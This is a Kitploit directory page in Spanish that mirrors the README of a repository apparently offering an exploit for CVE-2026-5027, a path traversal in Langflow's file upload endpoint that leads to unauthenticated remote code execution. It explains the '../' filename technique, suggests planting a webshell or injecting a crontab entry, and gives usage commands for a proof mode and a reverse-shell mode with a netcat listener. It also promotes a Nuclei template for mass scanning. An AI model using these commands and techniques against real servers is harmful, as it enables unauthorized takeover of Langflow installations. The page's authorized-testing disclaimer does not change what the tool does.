Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
Herramientas/GitHubGitHub/0xblackash/cve-2026-5027
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 CVE-2026-5027 - Path Traversal en Langflow

Vulnerabilidad cibernética_ explotación de path traversal

Escritura Arbitraria de Archivos a RCE
Ejecución Remota de Código No Autenticada mediante Subida de Archivos

CVE CVSS Exploit

📌 Descripción General

Langflow sufre una vulnerabilidad crítica de path traversal en el endpoint de subida de archivos (POST /api/v2/files).

Un atacante puede enviar un nombre de archivo malicioso que contenga secuencias ../ para escribir archivos arbitrarios en cualquier parte del sistema de archivos del servidor.

Esto conduce fácilmente a una Ejecución Remota de Código (RCE) completa — por ejemplo, colocando una webshell o inyectando en crontab.


🛠️ Características

  • ✅ Explotación no autenticada (configuraciones predeterminadas de auto-login)
  • ✅ Prueba de Concepto simple (escribe un archivo de prueba en /tmp)
  • ✅ Reverse Shell completo mediante cron (Linux)
  • ✅ Plantilla de Nuclei incluida para escaneo masivo
  • ✅ Fácil de personalizar la profundidad del traversal

🚀 Inicio Rápido

1. Prueba de Concepto (Prueba Segura)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

Salida esperada si es vulnerable:

root@kitploit:~
[+] ¡Éxito! Archivo escrito: ../../../tmp/CVE-2026-5027-proof.txt

2. Reverse Shell Completo

root@kitploit:~
# Iniciar listener
nc -lvnp 4444

# Ejecutar exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 Contenido del Repositorio

ArchivoDescripción
CVE-2026-5027.pyExploit principal en Python (PoC + RCE)
CVE-2026-5027.yamlPlantilla de Nuclei para escaneo
README.mdEste archivo

🎯 Ejemplos de Uso

cve-2026-5027

Modo Prueba (Proof)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

Modo Reverse Shell

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ Aviso Legal

Este repositorio es únicamente para fines educativos y de pruebas de seguridad autorizadas.

Úsalo de forma responsable y solo en sistemas para los que tengas permiso explícito de prueba.


Hecho con ❤️ para la comunidad de red team

Descargar herramienta